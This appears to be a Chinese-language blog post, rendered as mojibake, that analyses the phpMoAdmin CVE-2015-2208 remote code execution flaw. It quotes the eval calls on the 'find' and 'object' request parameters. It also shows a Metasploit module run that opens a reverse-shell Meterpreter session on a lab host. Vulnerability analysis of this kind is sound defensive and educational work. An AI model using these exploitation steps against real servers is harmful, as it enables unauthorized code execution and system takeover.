I"Â<h1 id="phpmoadmin-cve-2015-2208-è¿œç¨‹ä»£ç æ‰§è¡Œæ¼æ´åˆ†æ">phpMoadmin CVE-2015-2208 è¿œç¨‹ä»£ç æ‰§è¡Œæ¼æ´åˆ†æ</h1>
<p class="date">05 Mar 2015 - Tr3jer_CongRong</p>

<p>Â Â Â Â Â Â <strong>phpMoAdmin æ˜¯ä¸€ä¸ªç”¨PHP å¼€å‘çš„åœ¨çº¿MongoDB ç®¡ç†å·¥å…·ï¼Œå¯ç”¨äºåˆ›å»ºã€åˆ é™¤å’Œä¿®æ”¹æ•°æ®åº“å’Œç´¢å¼•ï¼Œæä¾›è§†å›¾å’Œæ•°æ®æœç´¢å·¥å…·ï¼Œæä¾›æ•°æ®åº“å¯åŠ¨æ—¶é—´å’Œå†…å­˜çš„ç»Ÿè®¡ï¼Œæ”¯æŒJSON æ ¼å¼æ•°æ®çš„å¯¼å…¥å¯¼å‡ºã€‚</strong></p>

<p><img src="https://blog-1252048719.cos.ap-shanghai.myqcloud.com/65ehrtdfgx.png" /></p>

<blockquote>
  <p>/phpmoadmin/moadmin.php ç¬¬555è¡Œ</p>
</blockquote>

<pre><code>public function listRows($collection) {
    foreach ($this-&gt;sort as $key =&gt; $val) { //cast vals to int
        $sort[$key] = (int) $val;
}
$col = $this-&gt;mongo-&gt;selectCollection($collection);
$find = array();
if (isset($_GET['find']) &amp;&amp; $_GET['find']) {
	$_GET['find'] = trim($_GET['find']);
	if (strpos($_GET['find'], 'array') === 0) {
		eval('$find = ' . $_GET['find'] . ';');
	} else if (is_string($_GET['find'])) {
		if ($findArr = json_decode($_GET['find'], true)) {
			$find = $findArr;
		}
	}
}
</code></pre>

<p>Â Â Â Â Â Â <strong>åœ¨è¿™ä¸ª<code>listRows</code>æ–¹æ³•ä¸­ï¼Œevalæ‰§è¡ŒGETæ¥æ”¶çš„<code>find</code>å‚æ•°ï¼Œé¦–å…ˆ<code>$find</code>å˜é‡åˆå§‹åŒ–ä¸ºæ•°ç»„ï¼Œè€Œä¸”é€šè¿‡strposåˆ¤æ–­ä¼ å…¥çš„å€¼æ˜¯å¦ä¸ºæ•°ç»„ã€‚çœ‹çœ‹å“ªé‡Œè°ƒç”¨äº†è¿™ä¸ªæ–¹æ³•ã€‚</strong></p>

<blockquote>
  <p>/phpmoadmin/moadmin.php ç¬¬836è¡Œ</p>
</blockquote>

<pre><code>if (isset($_GET['collection']) &amp;&amp; $action != 'listCollections' &amp;&amp; method_exists(self::$model, $action)) {
    $this-&gt;mongo[$action] = self::$model-&gt;$action($_GET['collection']);
    $this-&gt;mongo['count'] = self::$model-&gt;count;
    $this-&gt;mongo['colKeys'] = self::$model-&gt;colKeys;
}
</code></pre>

<p>Â Â Â Â Â Â <strong>é¦–å…ˆéœ€è¦è®¾ç½®<code>collection</code>ï¼Œæ ¹æ®<code>$action</code>è·Ÿè¸ªåˆ°ç¬¬785è¡Œï¼Œè¿™é‡Œå°±å¯ä»¥é€šè¿‡<code>action</code>æ¥æ”¶<code>listRows</code>å‚æ•°æ¥è°ƒç”¨<code>listRows</code>æ–¹æ³•ã€‚</strong></p>

<pre><code>$action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections');
</code></pre>

<p>Â Â Â Â Â Â <strong>æ•´ä½“è§¦å‘æ¼æ´çš„é€»è¾‘å°±æ˜¯é¦–å…ˆé€šè¿‡<code>action</code>æ¥æ”¶<code>listRows</code>ï¼Œè°ƒç”¨è¿™ä¸ªæ–¹æ³•åï¼Œevalå°±ä¼šæ‰§è¡Œ<code>$find</code>ä¼ å…¥çš„å€¼ã€‚ç”±äºè¿‡æ»¤ä¸ä¸¥ï¼Œå³å¯æ‰§è¡Œä¼ å…¥çš„ä»»æ„æ¶æ„ä»£ç ã€‚</strong></p>

<p><img src="https://blog-1252048719.cos.ap-shanghai.myqcloud.com/r67jtydhrgdfs.png" /></p>

<blockquote>
  <p>/phpmoadmin/moadmin.php ç¬¬693è¡Œ</p>
</blockquote>

<pre><code>public function saveObject($collection, $obj) {
    eval('$obj=' . $obj . ';'); //cast from string to array
    return $this-&gt;mongo-&gt;selectCollection($collection)-&gt;save($obj);
}
</code></pre>

<p>Â Â Â Â Â Â <strong><code>saveObject</code>å‡½æ•°ä¸­evalæ‰§è¡Œäº†å½¢å‚$objï¼Œæ‰¾æ‰¾å“ªé‡Œè°ƒç”¨äº†è¿™ä¸ªå‡½æ•°ã€‚</strong></p>

<blockquote>
  <p>/phpmoadmin/moadmin.php ç¬¬786è¡Œ</p>
</blockquote>

<pre><code>if (isset($_POST['object'])) {
        if (self::$model-&gt;saveObject($_GET['collection'], $_POST['object'])) {
            return $this-&gt;_dumpFormVals();
        } else {
            $action = 'editObject';
            $_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.';
        }
}
</code></pre>

<p>Â Â Â Â Â Â <strong>å¼€å¤´æ£€æŸ¥POSTæ˜¯å¦ä¼ è¾“äº†<code>object</code>ï¼Œéšåå†…åŒ…å«çš„ifè¿›è¡Œåˆ¤æ–­ï¼Œè¿™ä¸ªè¿‡ç¨‹å³è°ƒç”¨äº†å½“å‰ç±»çš„<code>saveObject</code>æ–¹æ³•ï¼ŒPOSTä¼ å…¥<code>object</code>å‚æ•°çš„å€¼å¸¦å…¥evalåå°±é€ æˆäº†ä»£ç æ‰§è¡Œã€‚</strong></p>

<p><img src="https://blog-1252048719.cos.ap-shanghai.myqcloud.com/Screen%20Shot%202016-03-06%20at%2012.24.03%20AM.png" /></p>

<blockquote>
  <p>Msfä¹Ÿå·²ç»æ›´æ–°äº†æ­¤æ¼æ´çš„Exploit:</p>
</blockquote>

<pre><code>msf &gt; use exploit/multi/http/phpmoadmin_exec
msf exploit(phpmoadmin_exec) &gt; show options

Module options (exploit/multi/http/phpmoadmin_exec):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST                       yes       The target address
RPORT      80               yes       The target port
SSL        false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The URI path of the PHPMoAdmin page
VHOST                       no        HTTP server virtual host

Exploit target:

Id  Name
--  ----
0   PHPMoAdmin

msf exploit(phpmoadmin_exec) &gt; set RHOST 172.16.20.136
RHOST =&gt; 172.16.20.136
msf exploit(phpmoadmin_exec) &gt; set TARGETURI /phpmoadmin
TARGETURI =&gt; /phpmoadmin
msf exploit(phpmoadmin_exec) &gt; exploit

[*] Started reverse TCP handler on 172.16.20.1:4444
[*] Executing payload...
[*] Sending stage (33684 bytes) to 172.16.20.136
[*] Meterpreter session 1 opened (172.16.20.1:4444 -&gt; 172.16.20.136:33492) at 2015-03-05 22:34:56 +0800

meterpreter &gt; ls
Listing: /php/www/phpmoadmin
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100644/rw-r--r--  31713   fil   2015-03-05 21:42:58 +0800  LICENSE
100644/rw-r--r--  5078    fil   2015-03-05 21:42:58 +0800  README.textile
100644/rw-r--r--  1858    fil   2015-03-05 21:42:58 +0800  change.log
100644/rw-r--r--  111430  fil   2015-03-05 21:42:58 +0800  moadmin.php
</code></pre>
:ET